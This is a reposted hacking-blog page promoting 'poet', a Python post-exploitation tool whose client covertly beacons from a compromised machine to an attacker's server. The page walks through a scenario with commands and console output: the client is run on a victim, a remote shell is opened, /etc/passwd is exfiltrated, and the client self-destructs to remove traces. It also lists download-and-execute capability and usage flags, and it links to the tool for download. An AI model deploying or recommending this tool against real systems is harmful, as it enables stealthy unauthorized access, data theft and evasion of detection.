Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

poet - A Simple Post-Exploitation Tool

Tags: server poet port

poet is a simple post-exploitation tool.

The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the Server isn't running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:
  • reconnaissance
  • remote shell
  • file exfiltration
  • download and execute
  • self-destruct


Example:

The scenario is, an attacker has gotten access to the victim's machine and downloaded and executed the client. She does not have the server running at this point, but it's ok, the client waits patiently. Eventually, the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server. Later, she connects again, self-destructing the client, removing all traces from the target.

Victim's Machine (5.4.3.2):
$ ./poet-client 1.2.3.4 10  # poet-client daemonizes, so there's nothing to see
Warning: After running this command, you'll need to either run selfdestruct from the server, or kill the poet-client process to stop the client.

Attacker's Machine (1.2.3.4):
$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:58:42) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:58:42) Poet server started (port 443)
[+] (06/28/15 03:58:50) Connected By: ('127.0.0.1', 54494) -> VALID
[+] (06/28/15 03:58:50) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
posh > shell
posh > [email protected] $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014
x86_64 x86_64 x86_64 GNU/Linux
posh > [email protected] $ ^D
posh > exfil /etc/passwd
posh : exfil written to archive/20150628/exfil/passwd-201506285917.txt
posh > ^D
[+] (06/28/15 03:59:18) Exiting control shell
[-] (06/28/15 03:59:18) Poet server terminated
$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:59:26) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:59:26) Poet server started (port 443)
[+] (06/28/15 03:59:28) Connected By: ('127.0.0.1', 54542) -> VALID
[+] (06/28/15 03:59:28) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > selfdestruct
[!] WARNING: You are about to permanently remove the client from the target.
    You will immediately lose access to the target. Continue? (y/n) y
[+] (06/28/15 03:59:33) Exiting control shell
[-] (06/28/15 03:59:33) Poet server terminated

Usage:

Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily test it out, a typical invocation would look like:

Terminal 1:
$ ./poet-client 127.0.0.1 1 --debug --no-selfdestruct
By default, the Poet client daemonizes and deletes itself from disk, so that behavior is suppressed using the --debug and --no-selfdestruct flags.

Terminal 2:
$ sudo ./poet-server
By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p flag on both the client and server. Pick a nice, high number for your port (> 1024).

Client:

$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct]
                   IP [INTERVAL]

positional arguments:
  IP                    Poet Server
  INTERVAL              Beacon Interval, in seconds. Default: 600

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  --debug               show debug messages. implies --no-daemon
  --no-daemon           don't daemonize
  --no-selfdestruct     don't selfdestruct
Poet is a client/server application. The client is executed on the target and beacons back to the server at a certain time interval. The only required argument is the IP address where the server is or will be running. Following it can optionally be the time interval in seconds of how frequently to beacon back, which defaults to 10 minutes. The port for the client to beacon out on can be specified with the -p flag. All other flags would not be used during "real" usage and exist mainly for debugging.

Server:

$ ./poet-server -h
usage: poet-server [-h] [-p PORT] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --version         prints the Poet version number and exits


Download poet

You might also like:
  • Unlock Android Phone or Tablet
  • The Hacker Wars (Documentary Film)
  • Penetrate Pro: Android App For Hackers
  • Hackers Are People Too (Documentary Film)
  • We Are Legion: The Story of the Hacktivists (Documentary Film)
  • My Favourite Computer Pranks
  • A Simple Hack To Secure Your Wallet
  • How To Hack Garages In Seconds Using a Mattel Toy
  • Hackers: The Internet's Immune System
  • Top 10 Hacking Scenes From Movies
  • Xprivacy - A Must Have App For Hackers
  • Shark For Root - Android App For Hackers


This post first appeared on Effect Hacking - Hacking Tools, How To Guides An, please read the originial post: here

Share the post

poet - A Simple Post-Exploitation Tool

×

Subscribe to Effect Hacking - Hacking Tools, How To Guides An

Get updates delivered right to your inbox!

Thank you for your subscription

×